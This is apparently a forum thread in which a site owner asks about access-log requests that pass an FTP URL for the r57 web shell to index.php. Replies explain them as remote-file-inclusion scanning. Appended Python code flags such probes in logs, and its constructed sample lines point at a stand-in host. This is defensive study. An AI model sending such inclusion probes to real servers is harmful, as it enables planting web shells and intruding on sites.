Suspicious Network Protocol Activity

Hi, I found the following lines in the access logs for two of my sites...

    - - [15/Oct/2013:00:47:08 +0800] "GET /index.php?option= HTTP/1.1" 200 31476 "-" "Mozilla/3.0 (compatible; Indy Library)"
    - - [15/Oct/2013:02:27:35 +0800] "GET /index.php?option= HTTP/1.1" 404 1404 "-" "Mozilla/3.0 (compatible; Indy Library)"
    - - [15/Oct/2013:03:02:14 +0800] "GET /index.php?option= HTTP/1.1" 404 1404 "-" "Mozilla/3.0 (compatible; Indy Library)"

What is the attacker trying to do? Are they trying to upload the r57 file to my server? I searched for it but it's not there.

Zephyr ICT (Cloud Architect) commented:
I think it was someone looking for something like this:

Since I only see GET commands we can assume they were not uploading something.

killdurst (Author) commented:
Assuming that the r57.txt at used by the attacker is identical to the one at "", what kind of response did the attacker get when he executed the following URL?

I executed the following command in my browser and the homepage uploaded correctly.

Note that "" is fictional in this case.

Zephyr ICT (Cloud Architect) commented:
I'm not sure what it does exactly, usually the option= is used for views I think ...

You could test it in a secured environment (e.g. a virtual machine). I would do it, but I'm at work and don't have access to one.

It could just download the file or it might just give an error 404 page not found.

In your test it just went to the front page because it couldn't find the option probably?

Maybe some other expert can give more insight in the web part?

Did you use the website tips to search for the files on your server? I know you already searched for it and couldn't find anything, just making sure.

Dave Howe (Software and Hardware Engineer) commented:
What they are trying to do is test for a relay vulnerability in your index.php - specifically, that it will download a file from the ftp site specified in the option argument. Assuming this isn't the case, you can safely ignore it as the sort of Internet background scanning that goes on all the time - but DO check that is the case first though :)

Zephyr ICT (Cloud Architect) commented:
"What they are trying to do is test for a relay vulnerability in your index.php"

That's what I figured as well ... But wasn't sure, thanks for clarifying.
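
One way to pull probes like these out of an access log and see which ones were answered with a 200, as an added example that is not part of the original thread. The log lines are constructed (documentation IP ranges, a .invalid host standing in for the URLs missing from the post), and the function name find_remote_include_probes is hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "[^"]*" "(?P<ua>[^"]*)"'
)
# A parameter value that is itself a URL is the mark of a remote-include probe.
REMOTE_RE = re.compile(r'^(?:ftp|https?)://', re.IGNORECASE)

def find_remote_include_probes(lines):
    """Return one dict per request whose query string carries a remote URL."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m['target']).query
        # parse_qsl percent-decodes, so ftp%3A%2F%2F... is caught too.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_RE.match(value.strip()):
                hits.append({
                    'ip': m['ip'], 'time': m['ts'], 'param': name,
                    'remote': value, 'status': int(m['status']),
                    'size': m['size'], 'ua': m['ua'],
                    # 2xx: the request reached the script, so confirm it did
                    # not fetch the URL. 404: the requested path was absent.
                    'needs_review': m['status'].startswith('2'),
                })
    return hits

# Constructed sample lines (documentation IPs, .invalid host), not from the thread.
UA = '"-" "Mozilla/3.0 (compatible; Indy Library)"'
SAMPLE = [
    '192.0.2.10 - - [15/Oct/2013:00:47:08 +0800] "GET /index.php?option='
    'ftp://files.example.invalid/r57.txt HTTP/1.1" 200 31476 ' + UA,
    '192.0.2.10 - - [15/Oct/2013:02:27:35 +0800] "GET /index.php?option='
    'ftp%3A%2F%2Ffiles.example.invalid%2Fr57.txt HTTP/1.1" 404 1404 ' + UA,
    '198.51.100.7 - - [15/Oct/2013:03:10:00 +0800] "GET /index.php?option='
    'com_content&view=article HTTP/1.1" 200 31476 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_remote_include_probes(SAMPLE):
        print(hit['time'], hit['ip'], hit['status'], hit['param'], hit['remote'])
```

A hit with needs_review set only says the server answered with a page; comparing its response size with a normal homepage request and checking for outbound FTP/HTTP connections from the web server at that time are the follow-up checks.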
Question has a verified solution.
